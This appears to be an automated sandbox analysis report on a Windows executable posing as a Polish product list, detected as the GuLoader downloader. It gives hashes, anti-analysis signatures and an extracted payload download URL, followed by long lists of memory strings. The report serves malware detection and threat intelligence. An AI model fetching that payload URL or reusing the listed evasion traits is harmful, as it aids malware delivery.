Loading ...

Play interactive tourEdit tour

Analysis Report Lista produkt#U00f3w.exe

Overview

General Information

Sample Name:Lista produkt#U00f3w.exe
Analysis ID:411100
MD5:c7f305d2e4f5e91e8118ac32ec796b0c
SHA1:c477a3d238b96c2a58e77bb7c818775e23f7d656
SHA256:0d28b94959edb70309a2754a83f2c9230b3176618ab571995d81955751ca2dbe
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Found potential dummy code loops (likely to delay analysis)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected potential crypto function
Program does not show much activity (idle)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • Lista produkt#U00f3w.exe (PID: 1492 cmdline: 'C:\Users\user\Desktop\Lista produkt#U00f3w.exe' MD5: C7F305D2E4F5E91E8118AC32EC796B0C)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=17FenSUBd1a7PqzhRX-elu4bxZvs0LF9Y"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: Lista produkt#U00f3w.exeMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=17FenSUBd1a7PqzhRX-elu4bxZvs0LF9Y"}
    Multi AV Scanner detection for submitted fileShow sources
    Source: Lista produkt#U00f3w.exeVirustotal: Detection: 34%Perma Link
    Source: Lista produkt#U00f3w.exeReversingLabs: Detection: 17%
    Source: Lista produkt#U00f3w.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=17FenSUBd1a7PqzhRX-elu4bxZvs0LF9Y
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D733E1 NtProtectVirtualMemory,0_2_01D733E1
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D71B3F NtAllocateVirtualMemory,0_2_01D71B3F
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_004072060_2_00407206
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_004072460_2_00407246
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_0040176F0_2_0040176F
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_004015800_2_00401580
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_004017BC0_2_004017BC
    Source: Lista produkt#U00f3w.exe, 00000000.00000000.2086108427.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFarveskrmene.exe vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3167446836.0000000001E58000.00000004.00000040.sdmpBinary or memory string: OriginalFilenameFarveskrmene.exeFE2X vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewersvcj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewbengine.exe.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepuiapi.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWfsR.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewmplayer.exe.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsfltr32.acm.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameaudiosrv.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamebatt.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMDMINST.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWCNCSVC.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamePOWRPROF.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAUTOPLAY.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedmdskres.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamegpscript.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesdcpl.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesrchadmin.dll.mui@ vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWPDSp.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameVfWWDM32.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameUsbui.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameERCj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamecscsvc.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameehRecvr.exe.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamessdpsrv.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXE.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenetcfgx.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsfeedsbs.dll.muiD vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameunregmp2.exe.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWUDFSvc.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWPCCPL.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameTrustedInstaller.exe.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameUxTheme.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenetprof.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamebattc.sys.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewevtsvc.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameappmgmts.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSHDOCVW.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesti_ci.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamefaultrep.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewdc.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameqwavedrv.sys.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewucltux.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameunpnhost.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameappinfo.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemidimap.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemmcndmgr.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAccessibilityCpl.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSRATING.DLL.MUID vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameoleres.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewmploc.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameACCTRES.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameOLEACCRC.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameIPBusEnum.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamerstrui.exe.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameieinstal.exe.muiD vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewmisvc.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSRVSVC.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedeskadp.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamePowerCPL.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsadp32.acm.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSRV.SYS.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameiccvid.drv.muiN vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamegpapi.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamebluetooth.cpl.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewpd_ci.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameINETRES.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMFC42.DLL.MUIR vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSWPRV.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamePhotoScreensaver.scr.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameATL.DLL.MUIR vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemmcbase.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamelhdfrgui.exe.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamePDH.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWMPNSSCI.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamescsiport.sys.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAVIFIL32.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemmci.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametermsrv.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameBubblesj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameIE4UINIT.EXE.MUID vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameiedkcs32.dll.muiD vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWinMail.exe.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewevtutil.exe.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameTBSSVC.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameulib.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamei8042prt.sys.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemycomput.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameparport.sys.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedsound.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamefwcfg.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameqwave.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameumrdp.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameehres.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWMPSideShowGadgetj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameonex.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsvfw32.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamethumbcache.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamelocalsec.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameUI0Detect.exe.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWLANGPUI.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSV1_0.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamehotplug.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSTI.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemmcss.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewuaueng.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameOLE32.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamew32time.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameslui.exe.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameUSERCPL.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametaskschd.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWMDM.dll.muiZ vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamebthci.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSHTMLER.DLL.MUID vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenapdsnap.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameREGSVC.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesbdropj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamebrserid.sys.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamecomdlg32.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSXS.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedps.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWMPNSCFG.EXE.MUIj% vs Lista produkt#U00f3w.exe
